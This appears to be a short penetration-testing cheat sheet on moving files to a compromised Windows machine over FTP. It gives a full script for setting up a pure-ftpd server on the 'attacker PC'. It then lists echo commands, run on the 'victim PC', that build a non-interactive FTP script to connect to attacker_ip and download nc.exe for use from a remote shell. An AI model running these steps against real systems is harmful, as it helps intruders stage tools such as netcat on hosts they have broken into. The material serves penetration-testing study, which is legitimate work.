File transfer FTP
- Default in most of Windows. But in interactive mode!
- Must use ftp -s:file_containing_ftp_commands
In Attacker PC, to install ftp server
- apt-get update && apt-get install pure-ftpd
In Attacker PC, create setupftp.sh in link
- #!/bin/bash
- groupadd ftpgroup
- useradd -g ftpgroup -d /dev/null -s /etc ftpuser
- pure-pw useradd ftpuser -u ftpuser -d /ftphome
- pure-pw mkdb
- cd /etc/pure-ftpd/auth/
- ln -s ../conf/PureDB 60pdb
- mkdir -p /ftphome
- chown -R ftpuser:ftpgroup /ftphome/
- /etc/init.d/pure-ftpd restart
In attacker PC, run setupftp.sh
- chmod 755 setupftp.sh
- /setupftp.sh
In victim PC, use "echo" to create a file with FTP commands. Replace ftpuser/ftppassword. "bin" is binary mode.
- SHOULD not have spaces before >>
- echo open attacker_ip 21> ftp.txt
- echo USER ftpuser>> ftp.txt
- echo ftppassword>> ftp.txt
- echo bin>> ftp.txt
- echo GET nc.exe>> ftp.txt
- echo bye>> ftp.txt
- ftp -v -n -s:ftp.txt
- To copy content of the above file in a non-interactive remote shell
- To execute and download a file